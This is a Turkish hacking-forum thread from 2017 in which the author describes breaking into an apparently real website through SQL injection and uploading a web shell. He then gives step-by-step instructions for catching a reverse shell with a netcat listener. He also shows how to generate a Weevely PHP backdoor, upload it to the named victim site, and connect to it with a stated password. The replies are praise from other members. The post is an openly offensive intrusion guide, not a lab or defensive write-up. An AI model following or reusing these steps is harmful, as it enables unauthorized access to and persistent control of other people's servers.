Netcat Ve Weevely Ile Serverda Backconnect Olmak

'Exploitler' forumunda ArslannBey tarafından 15 Ağustos 2017 tarihinde açılan konu

    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    Selamun Aleyküm Kendime Remote bir hedef belirledim SQL Açığı İle Admin Paneline Başarıyla Giriş
    yaptıktan sonra shell i başarıyla sisteme up ettim.


    Şimdi sistemde config çektik hiçbişey çıkmadı priv shellerimizle bypass etmeyi denedik çalış Allah çalış hiçbiri olmadı. Geriye kalan sv yi rootlamak kaldı. Ben ise sv yi rootlamanız için Sv yi dinlemeye alacağınız programların anlatımını yapacağım.


    Öncelikle Netcattan ardından Weevely 'i anlatmak istiyorum.

    Netcati kullandığım platform Windows 10

    Weevely i kullandığım Platform Kali Araçlarının yüklü olduğu Ubuntu/Linux


    Öncelikle

    Netcat ile backconnect olabilmeniz için Statik Bir IP Adresi lazım bunu DUCKDNS ile sağlayabilirsiniz. Ve Port açmanız lazım benim burda actıgım Port 443 Numaralı porttur.


    Öncelikle Shellimizde bulunan backconnect kısmına geliyoruz


    [​IMG]


    Evet Backconnect Kısmında

    YOUR IP : ipadresim.org

    Your ip yazan yer ip adresiniz olucak IP adresinizi ipadresim.org dan öğrenebilirsiniz.


    YOUR PORT : 192.168.1.1

    Burayada 192.168.1.1 den açtığınız port gelicek ben 443 numaralı portu açtım.


    Ve Ardından CMD mızı acıp netcatin bulundugu dosyaya girip.


    Kod:
    nc -vlp 443

    Yazıyoruz.

    Enterliyoruz

    Ardından Shellimize gidip Start diyoruz.


    [​IMG]


    Gördüğünüz Gibi SV yi dinlemeye aldım.


    Şimdi işimiz çok daha kolay Weevely ile SV yi dinlemeye alıcaz.


    Şimdi Açtık Terminalimizi ve

    Kod:
    weevely
    yazdık bize programın nasıl kullanıldıgını anlatıyor.. En Altta generate var. weevely yazın diyor ardından generate yazın diyor ardından şifre yazın diyor ben şifre olarak ayt123 ü seçtim ardındanda oluşacak dosyanın kaydedileceği yeri istiyor ben masaüstüme kaydettim..


    [​IMG]

    Görüldüğü gibi şimdi php dosyamız oluştu. Bu dosyayı alıp hedef sitemize up edicez.

    [​IMG]


    Gördüğünüz gibi Dosya Yükleme Başarılı Diyor Ardından Tekrar

    Kod:
    weevely
    
    Yazalım.

    Bizim için önemli olan şey Run terminal to the target.

    Şimdi oluşturduğumuz dosyayı nereye attıysak linkini alalım.


    http://www.jumpits.com/photos/aslan.php


    Oluşturduğum dosya linki burda. Linki aldıktan sonra şifremizi hatırlayalım.Ve weevlye şunu yazalım.


    Kod:
    weevely http://www.jumpits.com/photos/aslan.php ayt123
    [​IMG]


    Bunun ardından ise Oluşturdugumuz dosyanın olduğu linke gidelim internetten.

    http://www.jumpits.com/photos/aslan.php

    sayfa doldu sayfanın boş gelmesi lazım

    ardından

    Kod:
    ls
    komutu ile shelle geçiş yapabilirsiniz.

    [​IMG]




    Benden bu günlük bu kadar.)




     
    HAREZHAN, Sekhmet, BalaHatun ve 12 kişi daha bunu beğendi.
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
  1. sebuhi Atıldı

    Katılım:
    22 Şubat 2017
    Mesaj:
    4,470
    Alınan Beğeniler:
    4,233

    Özel Mesaj
    Eline sağlık.
     
    ArslannBey bunu beğendi.
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    sağolasın
     
    sebuhi bunu beğendi.
    Katılım:
    30 Eylül 2016
    Mesaj:
    1,283
    Alınan Beğeniler:
    1,164

    Özel Mesaj
    Hem
    anlatım hem görsellik hem de içerik açısından güzel bir konu.:)
     
    xTurkHacker ve ArslannBey bunu beğendi.
    Katılım:
    10 Kasım 2016
    Mesaj:
    3,362
    Alınan Beğeniler:
    4,901

    Özel Mesaj
    Güzel konu ellerine sağlık
     
    xTurkHacker ve ArslannBey bunu beğendi.
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    sağolun
     
  2. Network44 Atıldı

    Katılım:
    19 Nisan 2017
    Mesaj:
    2,928
    Alınan Beğeniler:
    6,380

    Özel Mesaj
    Eline sağlık devrem. Güzel konu.
     
    xTurkHacker ve ArslannBey bunu beğendi.
  3. xxmrtt ER

    Katılım:
    6 Temmuz 2017
    Mesaj:
    1,374
    Alınan Beğeniler:
    2,213

    Özel Mesaj
    Ellerine sağlık devrem yararlı bir konu :)
     
    ArslannBey bunu beğendi.
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    Sağolun
     
    xxmrtt ve Network44 bunu beğendi.
  4. babayoga Atıldı

    Katılım:
    1 Mart 2017
    Mesaj:
    250
    Alınan Beğeniler:
    162

    Özel Mesaj
    devrem site ne sitesi idi
     
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    nasıl?
     
    Katılım:
    16 Ekim 2016
    Mesaj:
    949
    Alınan Beğeniler:
    1,514
    Meslek:
    Öğrenci

    Özel Mesaj
    eline emeğine sağlık devrem bende düzgün anlatan birini arıyordum
     
    ArslannBey bunu beğendi.
  5. DraGan Atıldı

    Katılım:
    1 Temmuz 2017
    Mesaj:
    634
    Alınan Beğeniler:
    763

    Özel Mesaj
    İşte böyle konular lazım yahu, isminin son damlasına kadar hak ediyorusun tertip :)
     
    ArslannBey bunu beğendi.
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    Sağolun :)
     
    Katılım:
    17 Nisan 2017
    Mesaj:
    818
    Alınan Beğeniler:
    1,200

    Özel Mesaj
    Eline sağlık devrem.
     
    ArslannBey bunu beğendi.
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    sağolasın
     
    EspersSa bunu beğendi.
    Katılım:
    31 Aralık 2016
    Mesaj:
    1
    Alınan Beğeniler:
    0

    Özel Mesaj
    tesekürler
     
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    rica ederim
     
    Katılım:
    10 Kasım 2016
    Mesaj:
    3,362
    Alınan Beğeniler:
    4,901

    Özel Mesaj
    Boyle konularin simdi guncellenmesi guzel , bos konulardan insanlar boyle konulari bulamiyor.

    Aylar once ellerine saglik yazmisim. Tekrardan yazan ugrasan ellerine saglik.